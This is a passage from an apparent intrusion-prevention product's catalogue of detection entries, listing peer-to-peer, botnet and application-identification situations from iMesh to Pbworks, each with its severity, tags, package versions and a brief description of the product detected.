Tags: Windows, Any Hardware, iMesh, Windows not specific, iMesh not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-202-2032
Vulnerability: IM2Net-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_iMesh-Signin

About this situation: iMesh login attempted
Context: Any TCP Client Stream
Severity: 2
Tags: Windows, Any Hardware, iMesh, Windows not specific, iMesh not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-202-2032
Vulnerability: IM2Net-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_Limewire-Tls-Network-Connect

About this situation: Detects TLS handshakes typically used by the Limewire p2p application
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Limewire, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: Limewire-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_Manolito-Network-Connect

About this situation: Manolito p2p network connection attempt
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Manolito, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-516-5211
Vulnerability: Manolito-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_SoulSeek-Network-Connect

About this situation: SoulSeek p2p network connection attempt
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, SoulSeek, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-516-5211
Vulnerability: SoulSeek-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-UDP_BitTorrent-DHT-Protocol-Usage

About this situation: BitTorrent DHT protocol message detected
Context: Any UDP Packet
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-945-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-UDP_Dropbox-Lan-Sync-Discovery-Protocol-Usage

About this situation: Dropbox Lan Sync discovery protocol message detected
Context: Any UDP Packet
Severity: 2
Tags: Any Operating System, Any Hardware, Dropbox, Any Operating System not specific, Peer to Peer
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-640-5211
Vulnerability: Dropbox-Lan-Sync-Discovery-Protocol-Usage
Description:
Back to top

P2P-UDP_Mozi-Botnet-DHT-Traffic

About this situation: Mozi botnet DHT traffic was detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1222-5242
Vulnerability: Mozi-Botnet-Traffic
Description:
Back to top

PA Application Stop Condition

About this situation: Private Access Application Stop Condition
Context: Local Correlation
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1302-5242
Last changed: sgpkg-ips-1302-5242
Description: PA Application Stop Condition for use with Private Access Applications.
Back to top

Pace-Commerce

About this situation: Application Pace-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pace Commerce provides hosted eCommerce solution that allows to set up shop via the Internet.
Back to top

Pacejet

About this situation: Application Pacejet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pacejet is cloud-based enterprise shipping solution, SaaS platform that connects shippers to a network of Parcel, LTL, and 3PL carriers for unprecedented efficiency, improved cost-savings and exceptional customer service.
Back to top

Pacific-Poker

About this situation: Pacific Poker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Pacific-Timesheet-Software

About this situation: Application Pacific-Timesheet-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pacific Timesheet specializes in delivering large-scale cloud-based employee and asset time and work tracking software and services.
Back to top

Packetix-VPN

About this situation: Packetix VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-939-5242
Description: PacketiX VPN is a VPN software that uses virtual Ethernet technology for transporting all traffic from ISO layer 2 and above.
Back to top

Padlet

About this situation: Application Padlet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Padlet is an app that enables users to create an online bulletin board to display information on topic.
Back to top

Paessler

About this situation: Application Paessler detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paessler offers network monitoring software with a strong focus on usability and performance.
Back to top

PAETEC-Online

About this situation: Application PAETEC-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PAETEC provided local and long-distance voice services, data and Internet services, and software applications, among others.
Back to top

PageLever

About this situation: Application PageLever detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PageLever is an analytics platform for measuring a specific brand
Back to top

PageLime

About this situation: Application PageLime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PageLime is a SaaS remote Content Management System that allows you to update the content, images, and documents on your web site without installing any software.
Back to top

PageOnDemand

About this situation: Application PageOnDemand detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PageOnDemand is catalogue system that provides ability to promote your products in stores, on the internet, smartphones and paper, all within your budget and within your requirements
Back to top

PagePicnic

About this situation: Application PagePicnic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PagePicnic is website builder.
Back to top

PageProofer

About this situation: Application PageProofer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PageProofer is a service for web designers and developers to use with their teams and clients to simply the feedback and issue tracking process.
Back to top

PagerDuty

About this situation: Application PagerDuty detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PagerDuty aggregates errors from all of your IT monitoring tools and handles the people part of the equation: alerting (via phone, SMS or email), on-call scheduling and automatic escalation of critical incidents.
Back to top

PageUp-People

About this situation: Application PageUp-People detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PageUp People has helped employers worldwide attract, hire, develop, retain, and improve employee performance.
Back to top

Pagoda-Box

About this situation: Application Pagoda-Box detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pagoda Box is a Platform as a Service built for PHP. Platform let app developers spend their time on application code and deployment instead of managing and scaling their environment
Back to top

Paint.net

About this situation: Endpoint Context Agent based Paint.net detection
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: Paint.net endpoint application has been detected. Paint.net is a freeware graphics editor for Microsoft Windows.
Back to top

pair-Networks

About this situation: Application pair-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: pair Networks provides a range of Web hosting options to businesses, bloggers, artists, musicians, educational institutions, and non-profit organizations around the world.
Back to top

Paktvlive

About this situation: paktvlive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Palantir

About this situation: Application Palantir detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Palantir Technologies builds software platforms that help human experts perform powerful, collaborative analysis of data at scale. Palantir's software is deployed at public institutions, private enterprises, and in the non-profit sector to address the challenges of responsibly making sense of complex, diverse data.
Back to top

Palerra

About this situation: Application Palerra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Palerra ensures compliance of cloud footprint by threat detection, and automated incident response.
Back to top

Palo-Alto-Networks

About this situation: Palo Alto Networks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Usage of online services provided by Palo Alto Networks was detected.
Back to top

Palo-Alto-Networks-Applipedia

About this situation: Palo Alto Networks' Applipedia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Applipedia is an application information portal provided by Palo Alto Networks.
Back to top

Paltalk

About this situation: Application Paltalk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paltalk specializes in communications, enabling people to meet and interact around topics, interests, content and culture through group video, audio and text chat.
Back to top

Paltalk-Express

About this situation: Paltalk Express usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-628-5211
Description: Paltalk is an Internet chat service that allows users to communicate via instant messaging, voice and video chat.
Back to top

PamFax

About this situation: Application PamFax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Send and receive faxes easily with the PamFax fax software solution. Free to sign up, includes three free pages. Worldwide sending and recieving. Skype supported and certified.
Back to top

PanatrackerGP-Inventory

About this situation: Application PanatrackerGP-Inventory detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Panatrack creates solutions to track inventory and assets using automated data capture technologies
Back to top

Panaya

About this situation: Application Panaya detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Panaya ensures the continuous quality of packaged applications, enabling you to be more agile in addressing constant change. Panaya's Quality Management Cloud allows you to easily scope and accelerate the delivery of SAP, Oracle, and Salesforce application changes without compromising on risk or cost.
Back to top

Panda-Update

About this situation: Panda Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-643-5211
Description: Panda is a family of anti-virus and Internet security software developed by Panda Security S.L. Panda security application can receive updates from remote servers to keep itself up-to-date.
Back to top

PandaDoc

About this situation: Application PandaDoc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PandaDoc is a provider secure electronic signatures service that helps to improve paperwork process.
Back to top

PandI

About this situation: Application PandI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PandI is a company in HR industry. It is an HR cloud company with software for all HR tasks.
Back to top

Pando

About this situation: Pando usage detected
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-628-5211
Description: Pando is an ad-supported proprietary freeware for peer-to-peer file sharing. It uses SSL for user login, HTTP for services check, and the TCP communication default port is 56065.
Back to top

Pandora

About this situation: Pandora usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Users enter a song or artist that they enjoy, and the service responds by playing selections that are musically similar. Users provide feedback on approval or disapproval of individual songs, which Pandora takes into account for future selections. Source: Wikipedia
Back to top

Pandora-TV

About this situation: Pandora TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-1008-5242
Description: Pandora TV is a Flash based video sharing website.
Back to top

Panner5D

About this situation: Application Panner5D detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planner5D is a app which helps to create interior and landscape designs.
Back to top

Panopto

About this situation: Application Panopto detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Panopto is a video platform for sharing knowledge. It enables businesses and universities to record, webcast, manage, and search all of their video content.
Back to top

Panorama9

About this situation: Application Panorama9 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Panorama9 is a cloud-based IT management platform for enterprise network management that monitor hosted dashboards
Back to top

Panoramio

About this situation: Application Panoramio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Panoramio is a geolocation-oriented photo sharing website that provides imagery for Google Earth.
Back to top

PanTerra

About this situation: Application PanTerra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PanTerra Networks is provider of cloud-based unified communications Software-as-a-Service (SaaS) solutions for small and medium sized enterprises.
Back to top

Pantonium-Expense-Management

About this situation: Application Pantonium-Expense-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pantonium expense application provides mobile and web-based spend management tools to businesses.
Back to top

Paperless-Post

About this situation: Application Paperless-Post detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paperless Post allow design custom cards and invitations that reflect your personal style.
Back to top

PaperSave

About this situation: Application PaperSave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PaperSave is a complete document management, electronic workflow and invoice automation solution.
Back to top

Papertrail

About this situation: Application Papertrail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Papertrail is a document scanning software for small to mid sized businesses.
Back to top

PaperWise

About this situation: Application PaperWise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PaperWise is an Enterprise Content Management System that automates business processes.
Back to top

Papunet

About this situation: Papunet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1764-5242
Description: Papunet is a site that provides tools and information on speech impairments and plain language in Finnish.
Back to top

Parachute-Automotive-Recycling

About this situation: Application Parachute-Automotive-Recycling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Parachute Automotive Recycling is an environment Management Software for take back programs, as well as car recycling and donation programs.
Back to top

Parallels

About this situation: Application Parallels detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Parallels is a developer of desktop and server virtualization software include Parallels Desktop 10 for Mac as well as the remote access iPad app Parallels Access.
Back to top

Paramount

About this situation: Paramount usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Description: Paramount+ is an subscription video on-demand over-the-top streaming service. This application is meant for blocking only.
Back to top

Paran-Mail

About this situation: Paran Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application is a web-based Korean email service that also allows users to manage newsletter subscriptions.
Back to top

Parchment

About this situation: Application Parchment detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Parchment provides education credentials technology, allowing learners, educators and employers to collect, analyze and share credentials in simple and secure ways.
Back to top

Pardot

About this situation: Application Pardot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pardot offers a software-as-a-service marketing automation application that allows marketing and sales departments to create, deploy, and manage online marketing campaign.
Back to top

PARIM-Workforce-Management-Software

About this situation: Application PARIM-Workforce-Management-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PARiM is a workforce management software. Includes scheduling, time and asset tracking, remote clock in/ out and certificate monitoring.
Back to top

parity

About this situation: Application parity detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Parity Group PLC is a Professional Services organisation specialising in Recruitment and Talent Management and Business and IT Solutions.
Back to top

Parkcitygroup

About this situation: Application Parkcitygroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Park City Group is a business solutions and services provider that enable retailers and suppliers to work collaboratively as strategic partners to reduce out-of-stocks, shrink, inventory and labor while improving profits, efficiencies, and customer service.
Back to top

Parked Domain

About this situation: Sites that are expired, offered for sale, or known to display targeted links and advertisements.
Context: URL Application Context
Severity: 1
Tags: Parked Domain, Productivity Loss, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are expired, offered for sale, or known to display targeted links and advertisements.
Back to top

Parsons

About this situation: Application Parsons detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Parsons is an engineering, construction, technical, and management services firm.
Back to top

Partech

About this situation: Application Partech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ParTech, Inc.
Back to top

Partial.ly

About this situation: Application Partial.ly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Partial.ly provides businesses with a platform to sell products and services with payment plans.
Back to top

Particle

About this situation: Application Particle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Particle makes tools for engineers and designers to create new experiences through internet-connected hardware.
Back to top

PartyPoker

About this situation: PartyPoker traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-630-5211
Description: PartyPoker is an online poker game provided by an online gambling company PartyGaming Plc.
Back to top

Password expiration:the password will expire soon

About this situation: Password expiration:the password will expire soon
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1296-5242
Description: The password will expire soon.
Back to top

PasswordBox

About this situation: Application PasswordBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PasswordBox allows users to securely store, retrieve and share passwords and other personal data anytime, anywhere, on any device.
Back to top

Pastebin

About this situation: Pastebin usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-628-5211
Description: A pastebin is a web application where anyone can store text for a certain period of time.
Back to top

Pastel-My-Business-Online

About this situation: Application Pastel-My-Business-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pastel My Business Online is an online accounting solution for smaller businesses.
Back to top

Patelco

About this situation: Application Patelco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Patelco Credit Union is a community credit union that encompasses most of Northern California, particularly the San Francisco Bay Area.
Back to top

Pathfinder-Payment-Solutions

About this situation: Application Pathfinder-Payment-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pathfinder Payment Solutions delivers payment solutions that enable businesses to monetize sales. Its payment gateway accepts payments initiated through wireless and mobile terminals, the internet and the telephone, supports credit and debit cards, electronic checks, and electronic funds transfers.
Back to top

Patternry

About this situation: Application Patternry detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Patternry is an interface design patterns tool for building styleguides, design pattern libraries, complete front-end resources.
Back to top

Pay'NTime

About this situation: Application Pay'NTime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pay'NTime provides small or mid-sized business with payroll services that are friendly, flexible and affordable
Back to top

Pay-to-Surf

About this situation: Sites that reward users for online activity such as viewing websites, advertisements or email.
Context: URL Application Context
Severity: 1
Tags: Productivity, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that reward users for online activity such as viewing websites, advertisements or email.
Back to top

Paychex

About this situation: Application Paychex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paychex is a provider of payroll, human resource, and benefits outsourcing solutions for businesses. It offers human resource products and services including payroll processing, retirement services.
Back to top

Paycomonline

About this situation: Application Paycomonline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paycom provide employers streamline their payroll and HR processes with the latest cloud-based human capital management technology. Paycom payroll services over the Internet and for over a decade, our Software-as-a-Service
Back to top

Paycor

About this situation: Application Paycor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paycor offers cloud-based HR, payroll and timekeeping software.
Back to top

Paydirt

About this situation: Application Paydirt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paydirt is time tracking and invoicing software made for browser-based freelancers and small businesses.
Back to top

PayLoadz.com

About this situation: Application PayLoadz.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PayLoadz.com provide a service to sell downloadable items such as
Back to top

Paylocity

About this situation: Application Paylocity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paylocity is a provider of payroll and human resource products.
Back to top

Payment-Evolution

About this situation: Application Payment-Evolution detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PaymentEvolution provides easy to use, secure online payroll services to small and mid-sized businesses across Canada. Accountants, CPA firms and financial institutions rely on us for payroll expertise and services for their clientele. We're bringing innovation and simplicity back into the payroll market - from new ways to pay your employees to our open developer program
Back to top

Paymium

About this situation: Application Paymium detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Paymium is a currency exchange that allows trading between bitcoins
Back to top

Paymo

About this situation: Paymo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Paymo is a time tracking, invoicing, project management tool that can be used online or on a desktop providing detailed data on time spent.
Back to top

Payoneer

About this situation: Application Payoneer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Payoneer is a financial services business that provides money transfer and e-commerce payment services.
Back to top

PayPal

About this situation: PayPal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1238-5242
Description: PayPal is online fund transfer service.
Back to top

PayPanther-Online-CRM-Software

About this situation: Application PayPanther-Online-CRM-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PayPanther is a web-based software that combines CRM, invoicing, time tracking, and project management all in one.
Back to top

PayrollHero

About this situation: Application PayrollHero detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PayrollHero is a consumer-friendly Time, Attendance, Scheduling and Payroll app that is aimed at streamlining payroll, time and attendance tracking. It is a SaaS service in the cloud built for web and mobile Optimizing Work Productivity.
Back to top

PayScale

About this situation: Application PayScale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PayScale provides an immediate and precise snapshot of current market salaries to employees and employers through its online tools and software.
Back to top

PaySimple

About this situation: Application PaySimple detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PaySimple is provider of small business merchant accounts, mobile payments, electronic payments, and ACH processing services.
Back to top

PayWhirl-Recurring-Payments

About this situation: Application PayWhirl-Recurring-Payments detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PayWhirl provide suite of tools for create and manage recurring subscriptions or membership plans on any website.
Back to top

Payza

About this situation: Application Payza detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Payza platform allows for online payments to be processed and funds to be transferred via the internet between users who have registered for the service.
Back to top

Pbase

About this situation: PBase usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Pbinsight

About this situation: Application Pbinsight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pitney Bowes is a company offering products and solutions that enable commerce in the areas of customer information management, location intelligence, customer engagement, shipping and mailing, and global ecommerce.
Back to top

Pbworks

About this situation: PBWorks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
